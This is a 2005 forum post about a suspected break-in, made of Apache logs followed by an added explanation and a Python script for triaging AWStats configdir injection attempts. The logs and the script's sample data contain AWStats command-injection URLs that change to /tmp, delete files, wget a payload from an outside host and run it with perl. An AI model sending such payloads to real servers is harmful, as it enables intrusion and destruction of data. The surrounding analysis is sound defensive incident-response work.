Jacek
19.09.05, 09:04
Yesterday I noticed that apache had crashed.
I didn't think anything of it. Today I'm going through the logs and, lo and behold,
something suspicious!
I think I've been hacked!
Logs:
Apache errorlog:
[Sat Sep 17 23:17:37 2005] [error] [client 84.114.172.111] File does not exist: /htdocs
--03:04:35-- http://www.yogiplanet.com/linuxday.txt
=> `/tmp/.ayan'
Resolving www.yogiplanet.com... 205.234.147.232
Connecting to www.yogiplanet.com[205.234.147.232]:80... --03:04:45-- http://www.yogiplanet.com/linuxdaybot.txt
=> `/tmp/.ayan2'
Resolving www.yogiplanet.com... 205.234.147.232
Connecting to www.yogiplanet.com[205.234.147.232]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18,677 [text/plain]
0K .......... ........ 100% 53.03 KB/s
03:05:36 (53.03 KB/s) - `/tmp/.ayan2' saved [18677/18677]
failed: Connection timed out.
Retrying.
--03:07:45-- http://www.yogiplanet.com/linuxday.txt
(try: 2) => `/tmp/.ayan'
Connecting to www.yogiplanet.com[205.234.147.232]:80... failed: Connection timed out.
Retrying.
--03:10:56-- http://www.yogiplanet.com/linuxday.txt
(try: 3) => `/tmp/.ayan'
Connecting to www.yogiplanet.com[205.234.147.232]:80... failed: Connection timed out.
Retrying.
--03:14:08-- http://www.yogiplanet.com/linuxday.txt
(try: 4) => `/tmp/.ayan'
Connecting to www.yogiplanet.com[205.234.147.232]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,154 [text/plain]
0K ... 100% 27.29 KB/s
03:14:12 (27.29 KB/s) - `/tmp/.ayan' saved [3154/3154]
[Sun Sep 18 04:02:02 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/awstats.pl
[Sun Sep 18 04:02:03 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/cgi-bin
[Sun Sep 18 04:02:04 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/awstats
[Sun Sep 18 04:02:08 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/awstats.pl
[Sun Sep 18 04:02:08 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/stats
[Sun Sep 18 04:02:09 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/stats
[Sun Sep 18 04:02:10 2005] [error] [client 203.114.64.241] File does not exist: /var/www/apache2-default/stats
Apache accesslog:
xxxxx 203.114.64.241 - - [18/Sep/2005:04:02:02 +0200] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/Skins/de/viewde;perl%20icet;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
xxxxx 203.114.64.241 - - [18/Sep/2005:04:02:03 +0200] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
xxxxx 203.114.64.241 - - [18/Sep/2005:04:02:04 +0200] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
xxxxxx 203.114.64.241 - - [18/Sep/2005:04:02:08 +0200] "GET /awstats.pl/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 219 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
ns1.wm-solingen.de 203.114.64.241 - - [18/Sep/2005:04:02:08 +0200] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 214 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
xxxxxxx 203.114.64.241 - - [18/Sep/2005:04:02:09 +0200] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
xxxxx 203.114.64.241 - - [18/Sep/2005:04:02:10 +0200] "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/Skins/de/viewde;perl%20viewde;echo%20;rm%20-rf%20viewde*;echo| HTTP/1.1" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Can anyone say exactly what this script does?
Regards
Thomas
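What the posted requests are trying to do, as an added walkthrough and example that is not part of the original post: every request in the access log hits some path ending in awstats.pl with a configdir value framed by pipe characters. In AWStats releases before 6.3 (CVE-2005-0116) that parameter reached a Perl two-argument open() unsanitised, and Perl treats a "filename" framed by | as a command to run through the shell. URL-decoded, the value is a small shell script: echo; cd /tmp; rm -rf *; wget <payload>; perl <payload>; rm -rf <payload>*. All seven requests got a 404, so none of those paths had an awstats.pl on this host and that 04:02 scan executed nothing. The wget output sitting in the error log an hour earlier (03:04) is the part that matters: wget writes its progress to stderr, and a CGI's stderr ends up in Apache's error log, so that output most likely came from a command run inside the web server's process tree, fetching linuxday.txt and linuxdaybot.txt from www.yogiplanet.com into /tmp/.ayan and /tmp/.ayan2. Whether it came in through the same AWStats hole or some other way cannot be told from the excerpt; the access log around 03:04, the AWStats version installed, and whatever is still under /tmp are the places to look.

The script below is an added example, not code from the post or from AWStats. The log lines inside it are constructed (documentation IP ranges, a made-up payload host); only the request shape follows the post. It parses combined-format lines with the optional leading virtual-host field the post's LogFormat uses, URL-decodes configdir, recognises the |...| framing, splits the enclosed command list, pulls out the download URLs, and marks each hit by whether the CGI actually answered, since a 404 cannot have run anything.

```python
"""Triage AWStats configdir command-injection attempts in an Apache access log."""
import re
from urllib.parse import unquote

# Constructed sample log (documentation IPs, made-up payload host); the third
# line carries a leading virtual-host field like the log format in the post.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Sep/2005:04:02:02 +0200] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://192.0.2.10/x/payload;perl%20payload;echo%20;rm%20-rf%20payload*;echo| HTTP/1.1" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
198.51.100.3 - - [18/Sep/2005:04:05:11 +0200] "GET /cgi-bin/awstats.pl?config=example.org HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
www.example.org 203.0.113.7 - - [18/Sep/2005:04:06:40 +0200] "GET /stats/awstats.pl?configdir=|cd%20/tmp;curl%20-O%20http://192.0.2.10/x/p2;sh%20p2| HTTP/1.1" 200 1024 "-" "curl/7.1"
"""

# Combined log format with an optional leading vhost token in front of the
# client address (the post's LogFormat has one; plain CLF does not).
LOG_RE = re.compile(
    r'^(?:(?P<vhost>\S+) )?(?P<client>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ '
    r'\[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Perl two-arg open() hands the enclosed text to the shell when the "filename"
# is framed by pipe characters; that is the AWStats < 6.3 hole being probed.
PIPE_FRAME_RE = re.compile(r"^\|(?P<cmd>.*)\|$", re.S)
CMD_SEP_RE = re.compile(r"\s*(?:;|&&|\|\|)\s*")
URL_RE = re.compile(r"https?://[^\s;|&'\"]+")


def parse_query(query):
    """Split a raw query string into {name: [values]} without touching ';'.
    urllib.parse.parse_qs treated ';' as a separator before Python 3.10, which
    would shred exactly the payload we want to see, so do it by hand."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.setdefault(unquote(name), []).append(unquote(value))
    return params


def extract_injection(configdir):
    """Return the shell commands and download URLs hidden in a |...| configdir
    value, or None for an ordinary directory value."""
    m = PIPE_FRAME_RE.match(configdir)
    if not m:
        return None
    cmd = m.group("cmd")
    commands = [c for c in (s.strip() for s in CMD_SEP_RE.split(cmd)) if c]
    return {"commands": commands, "urls": URL_RE.findall(cmd)}


def triage(log_text):
    """Return one finding per request that carries a configdir injection."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if not path.endswith("awstats.pl"):
            continue
        for value in parse_query(query).get("configdir", []):
            inj = extract_injection(value)
            if inj is None:
                continue
            status = int(m.group("status"))
            findings.append({
                "vhost": m.group("vhost"),
                "client": m.group("client"),
                "time": m.group("ts"),
                "path": path,
                "status": status,
                # 404: no awstats.pl at that path, nothing ran. 200: the CGI
                # answered, so an unpatched version would have executed the
                # commands; that host needs a forensic look.
                "cgi_answered": status == 200,
                "commands": inj["commands"],
                "download_urls": inj["urls"],
            })
    return findings


def indicators(findings):
    """Collapse findings into the two lists handed to blocking and hunting."""
    return {
        "clients": sorted({f["client"] for f in findings}),
        "download_urls": sorted({u for f in findings for u in f["download_urls"]}),
    }


if __name__ == "__main__":
    hits = triage(SAMPLE_LOG)
    for h in hits:
        print(h["time"], h["client"], h["path"], h["status"],
              "CGI answered" if h["cgi_answered"] else "404, nothing ran")
        for c in h["commands"]:
            print("    ", c)
    print(indicators(hits))
```

Run it against the real access log by replacing SAMPLE_LOG with the file contents; a hit with status 200 against a path that really serves awstats.pl is the case where the /tmp contents and the AWStats version on that host must be checked, and the download URLs are what to search for in the error log and on the box.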